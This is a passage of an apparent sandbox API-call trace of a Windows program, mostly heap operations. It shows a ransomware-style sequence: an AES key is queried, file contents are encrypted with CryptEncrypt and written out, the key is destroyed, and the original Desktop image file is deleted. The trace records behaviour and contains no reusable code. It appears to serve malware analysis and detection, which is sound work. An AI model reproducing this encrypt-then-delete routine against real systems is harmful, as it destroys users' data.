HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0122.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.385] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0122.385] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e2900, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2900*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0122.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.387] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.387] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.387] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0122.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.388] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.388] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.390] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x156b0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x156c0) returned 1 [0122.390] CharLowerBuffW (in: lpsz="byte[87745]", cchLength=0xb | out: lpsz="byte[87745]") returned 0xb [0122.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.428] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4506008*, pdwDataLen=0x144e790*=0x156b0, dwBufLen=0x156c0 | out: pbData=0x4506008*, pdwDataLen=0x144e790*=0x156c0) returned 1 [0122.428] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.435] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x156c0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x156c0, lpOverlapped=0x0) returned 1 [0122.438] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.438] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca958, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.438] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0122.438] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.439] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.439] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.439] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.439] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.439] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.439] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.439] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.439] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.439] CloseHandle (hObject=0x258) returned 1 [0122.439] CloseHandle (hObject=0x2a0) returned 1 [0122.447] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg", lpFilePart=0x0) returned 0x21 [0122.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0122.447] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bwlcz.jpg")) returned 0x20 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c68 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0122.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0122.448] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8a7ab0, ftCreationTime.dwHighDateTime=0x1d5ec1b, ftLastAccessTime.dwLowDateTime=0x90f581f0, ftLastAccessTime.dwHighDateTime=0x1d5e446, ftLastWriteTime.dwLowDateTime=0x90f581f0, ftLastWriteTime.dwHighDateTime=0x1d5e446, nFileSizeHigh=0x0, nFileSizeLow=0x156b0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="BwLCz.jpg", cAlternateFileName="")) returned 0x41ac600 [0122.448] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bwlcz.jpg")) returned 1 [0122.458] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8a7ab0, ftCreationTime.dwHighDateTime=0x1d5ec1b, ftLastAccessTime.dwLowDateTime=0x90f581f0, ftLastAccessTime.dwHighDateTime=0x1d5e446, ftLastWriteTime.dwLowDateTime=0x90f581f0, ftLastWriteTime.dwHighDateTime=0x1d5e446, nFileSizeHigh=0x0, nFileSizeLow=0x156b0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="BwLCz.jpg", cAlternateFileName="")) returned 0 [0122.458] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0122.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 